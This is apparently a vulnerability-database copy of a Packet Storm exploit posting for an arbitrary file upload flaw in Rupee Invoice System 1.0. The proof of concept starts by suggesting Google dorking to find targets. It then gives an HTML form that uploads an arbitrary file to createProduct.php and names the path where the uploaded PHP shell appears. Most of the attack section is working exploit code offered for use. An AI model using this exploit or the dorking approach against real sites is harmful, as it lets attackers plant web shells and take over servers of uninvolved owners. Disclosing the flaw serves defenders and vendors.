Lucene search
K

Rupee Invoice System 1.0 Arbitrary File Upload

🗓️ 26 Sep 2024 00:00:00Reported by indoushkaType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 255 Views

Rupee Invoice System 1.0 Arbitrary File Upload vulnerability on windows 10 with Mozilla Firefox 128.0.

Code
`=============================================================================================================================================  
| # Title : Rupee Invoice System v1.0 Remote File Upload Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |  
| # Vendor : https://www.mayurik.com/ |  
=============================================================================================================================================  
  
poc :  
  
[+] Dorking İn Google Or Other Search Enggine.  
  
[+] The following html code uploads a executable malicious file remotely .  
  
[+] Go to the line 7.  
  
[+] Set the target site link Save changes and apply .   
  
[+] infected file : phpinventory/php_action/createProduct.php.  
  
[+] save code as poc.html .  
  
<!DOCTYPE html>  
<html>  
<head>  
<title>Create Product</title>  
</head>  
<body>  
<form action="http://127.0.0.1/phpinventory/php_action/createProduct.php" method="POST" enctype="multipart/form-data">  
<input type="hidden" name="currnt_date" value="100">  
  
<label for="productImage">Product Image:</label>  
<input type="file" name="productImage" id="productImage" required><br><br>  
  
<input type="submit" name="create" value="Create">  
</form>  
</body>  
</html>  
  
[+] http://127.0.0.1/phpinventory/assets/myimages/dab.php  
  
Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation